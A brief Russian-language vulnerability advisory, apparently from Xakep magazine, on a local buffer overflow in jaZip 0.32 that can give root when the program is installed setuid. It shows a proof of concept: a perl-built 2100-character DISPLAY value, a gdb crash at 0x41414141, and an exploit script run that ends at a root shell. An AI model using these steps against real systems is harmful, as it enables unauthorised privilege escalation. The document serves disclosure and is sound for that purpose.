Хакер #305. Многошаговые SQL-инъекции
jaZip - программа для управления Iomega Zip'ом и/или дисками Jaz и дисками под Linux. Уязвимость в программе позволяет локальным пользователям "заставить" программу выполнить произвольный программный код. Иногда программа установлена (хотя администратор, секущий фишку, никогда так не сделает) как setuid, что позволяет получение повышенных привилегий.
Системы уязвимы:
JaZip 0.32 (в том числе патченная до 2-го "уровня")
Пример:
# export DISPLAY=`perl -e '{print "A"x"2100"}'`
# gdb /usr/X11R6/bin/jazip
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
(gdb) r
Starting program: /usr/X11R6/bin/jazip
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
----
$ rpm -q jaZip
jaZip-0.32-2
$ ./jazip-exploit.pl
Address: 0xbffff7ac
bash#